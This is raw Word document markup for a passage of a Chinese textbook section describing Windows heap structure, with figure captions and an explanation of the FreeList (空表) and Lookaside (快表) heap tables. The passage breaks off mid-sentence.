                <v:shape id="_x0000_s1028" type="#_x0000_t202" style="position:absolute;left:6075;top:752;width:4496;height:3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NRwwAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Ra8Iw&#10;FIXfB/6HcAXfZmrBMTqjiCCs4Bir/oBLctdWm5uSZLXdr18Ggz0ezjnf4Wx2o+3EQD60jhWslhkI&#10;Yu1My7WCy/n4+AwiRGSDnWNSMFGA3Xb2sMHCuDt/0FDFWiQIhwIVNDH2hZRBN2QxLF1PnLxP5y3G&#10;JH0tjcd7gttO5ln2JC22nBYa7OnQkL5VX1bB6TuE9Tkru/I9Dn7SF319a09KLebj/gVEpDH+h//a&#10;r0ZBDr9X0g2Q2x8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEARqjjUcMAAADaAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" fillcolor="white [3201]" strokeweight=".5pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="535EE32B" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>堆表</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:shape>
                <v:rect id="矩形 5" o:spid="_x0000_s1029" style="position:absolute;left:23380;top:19861;width:4885;height:3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NVHwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;FITvBf9DeII3zaq1yNYoKij24EG79fzYPHcXNy9LEnXrrzcFocdhZr5hZovW1OJGzleWFQwHCQji&#10;3OqKCwXZ96Y/BeEDssbaMin4JQ+Leedthqm2dz7Q7RgKESHsU1RQhtCkUvq8JIN+YBvi6J2tMxii&#10;dIXUDu8Rbmo5SpIPabDiuFBiQ+uS8svxahSchmGVsc8ey/107LZfp537wXelet12+QkiUBv+w6/2&#10;TiuYwN+VeAPk/AkAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQA3sNVHwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="3011C6C1" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>块首</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 6" o:spid="_x0000_s1030" style="position:absolute;left:28265;top:19865;width:10307;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swwgAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bi8Iw&#10;FITvgv8hPGFvmrqKSDWKLqzowcNq9fxonm2xeSlJVrv+eiMseBxm5htmvmxNLW7kfGVZwXCQgCDO&#10;ra64UJAdv/tTED4ga6wtk4I/8rBcdDtzTLW98w/dDqEQEcI+RQVlCE0qpc9LMugHtiGO3sU6gyFK&#10;V0jt8B7hppafSTKRBiuOCyU29FVSfj38GgXnYVhn7LPHaj8duc3uvHUnHCv10WtXMxCB2vAO/7e3&#10;WsEEXlfiDZCLJwAAAP//AwBQSwECLQAUAAYACAAAACEA2+H2y+4AAACFAQAAEwAAAAAAAAAAAAAA&#10;AAAAAAAAW0NvbnRlbnRfVHlwZXNdLnhtbFBLAQItABQABgAIAAAAIQBa9CxbvwAAABUBAAALAAAA&#10;AAAAAAAAAAAAAB8BAABfcmVscy8ucmVsc1BLAQItABQABgAIAAAAIQDHYkswwgAAANoAAAAPAAAA&#10;AAAAAAAAAAAAAAcCAABkcnMvZG93bnJldi54bWxQSwUGAAAAAAMAAwC3AAAA9gIAAAAA&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="412F06CD" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                            <w:kern w:val="2"/>
                          </w:rPr>
                          <w:t>块身</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 8" o:spid="_x0000_s1031" style="position:absolute;left:1193;top:14589;width:4882;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rZwAAAANoAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/Pa8Iw&#10;FL4L/g/hCbvZ1G2MUo2iwoY77LBaPT+aZ1NsXkqSabe/fjkMdvz4fq82o+3FjXzoHCtYZDkI4sbp&#10;jlsF9fF1XoAIEVlj75gUfFOAzXo6WWGp3Z0/6VbFVqQQDiUqMDEOpZShMWQxZG4gTtzFeYsxQd9K&#10;7fGewm0vH/P8RVrsODUYHGhvqLlWX1bBeRF3NYf6Z/tRPPm39/PBn/BZqYfZuF2CiDTGf/Gf+6AV&#10;pK3pSroBcv0LAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEA2bF62cAAAADaAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="4DF5F122" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                            <w:kern w:val="2"/>
                          </w:rPr>
                          <w:t>块首</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 10" o:spid="_x0000_s1032" style="position:absolute;left:6081;top:14589;width:1030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j6xAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Bb8Iw&#10;DIXvSPyHyEi7Qco2TagQECBtYocdVgpnqzFtReNUSQbdfv18mLSbrff83ufVZnCdulGIrWcD81kG&#10;irjytuXaQHl8nS5AxYRssfNMBr4pwmY9Hq0wt/7On3QrUq0khGOOBpqU+lzrWDXkMM58TyzaxQeH&#10;SdZQaxvwLuGu049Z9qIdtiwNDfa0b6i6Fl/OwHmediXH8mf7sXgKb+/nQzjhszEPk2G7BJVoSP/m&#10;v+uDFXyhl19kAL3+BQAA//8DAFBLAQItABQABgAIAAAAIQDb4fbL7gAAAIUBAAATAAAAAAAAAAAA&#10;AAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhAFr0LFu/AAAAFQEAAAsA&#10;AAAAAAAAAAAAAAAAHwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAJqCePrEAAAA2wAAAA8A&#10;AAAAAAAAAAAAAAAABwIAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAAAwADALcAAAD4AgAAAAA=&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="35C8273A" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>块身</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 12" o:spid="_x0000_s1033" style="position:absolute;left:27842;top:9194;width:4882;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EMWwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0v+B/CCN7WVF0WqUZRQXEPe1itnodmbIvNpCRRq79+Iwje5vE+ZzpvTS2u5HxlWcGgn4Agzq2u&#10;uFCQ7defYxA+IGusLZOCO3mYzzofU0y1vfEfXXehEDGEfYoKyhCaVEqfl2TQ921DHLmTdQZDhK6Q&#10;2uEthptaDpPkWxqsODaU2NCqpPy8uxgFx0FYZuyzx+J3PHKbn+PWHfBLqV63XUxABGrDW/xyb3Wc&#10;P4TnL/EAOfsHAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEABRxDFsAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="3CC0F9B2" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>块首</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:rect id="矩形 16" o:spid="_x0000_s1034" style="position:absolute;left:32730;top:9194;width:1030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UVwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE9Ni8Iw&#10;EL0L/ocwwt40dRWRahRdWNGDh9XqeWjGtthMSpLVrr/eCAve5vE+Z75sTS1u5HxlWcFwkIAgzq2u&#10;uFCQHb/7UxA+IGusLZOCP/KwXHQ7c0y1vfMP3Q6hEDGEfYoKyhCaVEqfl2TQD2xDHLmLdQZDhK6Q&#10;2uE9hptafibJRBqsODaU2NBXSfn18GsUnIdhnbHPHqv9dOQ2u/PWnXCs1EevXc1ABGrDW/zv3uo4&#10;fwKvX+IBcvEEAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAeidFFcAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" fillcolor="white [3201]" strokecolor="black [3200]" strokeweight="1pt">
                  <v:textbox inset="2.444mm,1.222mm,2.444mm,1.222mm">
                    <w:txbxContent>
                      <w:p w14:paraId="489B96D4" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
                        <w:pPr>
                          <w:pStyle w:val="af9"/>
                          <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0" w:line="360" w:lineRule="auto"/>
                          <w:jc w:val="both"/>
                        </w:pPr>
                        <w:r>
                          <w:rPr>
                            <w:rFonts w:ascii="Times New Roman" w:cs="Times New Roman" w:hint="eastAsia"/>
                          </w:rPr>
                          <w:t>块身</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10571;top:2617;width:17271;height:822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rwwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRE/NisIw&#10;EL4L+w5hFvam6Xrwp2sUVxD2IIjVBxib2abYTEoSa317Iwje5uP7ncWqt43oyIfasYLvUQaCuHS6&#10;5krB6bgdzkCEiKyxcUwK7hRgtfwYLDDX7sYH6opYiRTCIUcFJsY2lzKUhiyGkWuJE/fvvMWYoK+k&#10;9nhL4baR4yybSIs1pwaDLW0MlZfiahVMfs/7tphfS3MyXfTV2c4Ou7FSX5/9+gdEpD6+xS/3n07z&#10;p/D8JR0glw8AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAorYq8MAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:shape id="连接符: 曲线 18" o:spid="_x0000_s1036" type="#_x0000_t38" style="position:absolute;left:993;top:7127;width:10103;height:482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lywwAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9BawIx&#10;EIXvhf6HMAVvNWspUlejSKEghS3UFs/jZtwsbiZLkrrrv+8cBG8zvDfvfbPajL5TF4qpDWxgNi1A&#10;EdfBttwY+P35eH4DlTKyxS4wGbhSgs368WGFpQ0Df9NlnxslIZxKNOBy7kutU+3IY5qGnli0U4ge&#10;s6yx0TbiIOG+0y9FMdceW5YGhz29O6rP+z9vwB6Oi6/ZKReuiofX3TD/rKojGjN5GrdLUJnGfDff&#10;rndW8AVWfpEB9PofAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAA&#10;AAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAA&#10;AAAAAAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAYavZcsMAAADbAAAADwAA&#10;AAAAAAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPcCAAAAAA==&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <v:shape id="连接符: 曲线 21" o:spid="_x0000_s1037" type="#_x0000_t38" style="position:absolute;left:10508;top:4545;width:15377;height:1525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WtCwAAAANsAAAAPAAAAZHJzL2Rvd25yZXYueG1sRI9Pi8Iw&#10;FMTvgt8hPMGbpgpKqUZZVsU9Cf7B86N525RtXkITtX77jSB4HGbmN8xy3dlG3KkNtWMFk3EGgrh0&#10;uuZKweW8G+UgQkTW2DgmBU8KsF71e0sstHvwke6nWIkE4VCgAhOjL6QMpSGLYew8cfJ+XWsxJtlW&#10;Urf4SHDbyGmWzaXFmtOCQU/fhsq/080qwHIzNwfj8bjVe2Nn11z7OldqOOi+FiAidfETfrd/tILp&#10;BF5f0g+Qq38AAAD//wMAUEsBAi0AFAAGAAgAAAAhANvh9svuAAAAhQEAABMAAAAAAAAAAAAAAAAA&#10;AAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAWvQsW78AAAAVAQAACwAAAAAA&#10;AAAAAAAAAAAfAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAdplrQsAAAADbAAAADwAAAAAA&#10;AAAAAAAAAAAHAgAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAADAAMAtwAAAPQCAAAAAA==&#10;" adj="10800" strokecolor="black [3200]" strokeweight=".5pt">
                  <v:stroke endarrow="block" joinstyle="miter"/>
                </v:shape>
                <w10:anchorlock/>
              </v:group>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9105AF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">.12 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>堆结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C9404C9"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>两类重要堆表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7588506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堆表有很多种，且随</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>操作系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>的不同而不同，Windows</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>系统</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>常见的有：FreeList</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>（</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>）和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Lookaside（快表）</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0980B6B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（1）空表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF434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空表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>是</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>双向链表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>有128项，每项标识指定大小的空闲块</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空闲块大小=索引项（ID）*8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，其中</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>Free[0]标识大于等于1024 Byte的空闲块</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，空表结构如图2</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>.13</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>所示。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AF5EE96"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noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="58ACF5E4" wp14:editId="7E620AC2">
            <wp:extent cx="5530370" cy="3396343"/>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518" t="3085" r="3419" b="14536"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5592494" cy="3434495"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                    <a:extLst>
                      <a:ext uri="{53640926-AAD7-44D8-BBD7-CCE9431645EC}">
                        <a14:shadowObscured xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main"/>
                      </a:ext>
                    </a:extLst>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CED5DF" w14:textId="77777777" w:rsidR="002C1A85" w:rsidRPr="00CA5248" w:rsidRDefault="002C1A85" w:rsidP="002C1A85">
      <w:pPr>
        <w:pStyle w:val="a7"/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>图</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">2.13 </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>空表结构</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44EF9CA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（2）快</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3758DDC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快表有</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>128项</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>采用单向链表</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman" w:hint="eastAsia"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="Times New Roman"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>链中的堆从不发生合并</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA5248">
        <w:rPr>
